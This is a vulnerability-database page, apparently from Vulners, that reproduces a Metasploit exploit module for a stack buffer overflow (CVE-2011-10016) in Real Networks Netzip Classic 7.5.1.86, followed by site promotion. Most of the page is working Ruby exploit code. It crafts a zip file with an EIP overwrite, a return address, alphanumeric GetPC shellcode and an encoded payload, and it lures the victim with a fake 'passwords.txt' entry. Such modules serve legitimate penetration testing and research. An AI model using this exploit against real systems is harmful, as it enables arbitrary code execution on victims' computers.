Lucene search
+L

Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability

🗓️ 30 Jan 2011 00:00:00Reported by C4SS!0 G0M3S, TecR0c <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability. Exploits stack-based buffer overflow in version 7.5.1 86 of Real Networks Netzip Classic. Allows executing arbitrary code as victim user

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-10016
29 May 201815:50
circl
cnnvd
CNNVD
Real Networks Netzip Classic 安全漏洞
13 Aug 202500:00
cnnvd
cve
CVE
CVE-2011-10016
13 Aug 202520:52
cve
cvelist
Cvelist
CVE-2011-10016 Real Networks Netzip Classic 7.5.1.86 File Parsing Buffer Overflow
13 Aug 202520:52
cvelist
euvd
EUVD
EUVD-2011-5243
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-10016
13 Aug 202521:15
nvd
ptsecurity
Positive Technologies
PT-2025-33085 · Realnetworks · Netzip Classic
13 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2011-10016
15 Aug 202521:29
redhatcve
vulnrichment
Vulnrichment
CVE-2011-10016 Real Networks Netzip Classic 7.5.1.86 File Parsing Buffer Overflow
13 Aug 202520:52
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in
          version 7.5.1 86 of Real Networks Netzip Classic.
          In order for the command to be executed, an attacker must convince someone to
          load a specially crafted zip file with NetZip Classic.
          By doing so, an attacker can execute arbitrary code as the victim user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'C4SS!0 G0M3S', # Vulnerability discovery and original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2011-10016' ],
          [ 'OSVDB', '83436' ],
          [ 'EDB', '16083' ],
          [ 'BID', '46059' ],
          [ 'URL', 'http://proforma.real.com' ]
        ],
        'Platform' => [ 'win' ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 1000,
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          'DisableNops' => true,
          'EncoderOptions' =>
                        {
                          'BufferRegister' => 'ESI'
                        }
        },
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'Offset' => 247, # To EIP
              'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
              'Max' => 2000,       # Max buffer size
            }
          ],

          [
            'Windows 7/Windows Vista',
            {
              'Offset' => 248, # To EIP
              'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
              'Max' => 2000,       # Max buffer size
            }
          ],
        ],
        'DisclosureDate' => '2011-01-30',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
        OptString.new('CONTENTNAME', [ true, 'Name of the fake zipped file', 'passwords.txt']),
      ]
    )
  end

  def exploit
    buffer = "#{datastore['CONTENTNAME']}"
    buffer << ' ' * (target['Offset'] - buffer.length)
    buffer << [target.ret].pack('V')
    buffer << make_nops(8)

    # GetPC - Non ascii characters get converted
    # alphanum getpc code from corelanc0d3r
    buffer << "\x89\x05"   # jmp short (5 bytes) to 'jmp back' at end
    buffer << "\x5e"       # pop esi
    buffer << "\x41"       # nop (inc ecx)
    buffer << "\x98\x99"   # call esi
    buffer << "\x41"       # nop (inc ecx)
    buffer << "\x8a\x94\x98\x98\x98" # jmp back to pop esi
    buffer << payload.encoded
    buffer << rand_text_alpha(target['Max'] - buffer.length)

    zip = Rex::Zip::Archive.new
    xtra = [0xdac0ffee].pack('V')
    comment = [0xbadc0ded].pack('V')
    zip.add_file(buffer, xtra, comment)

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(zip.pack)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation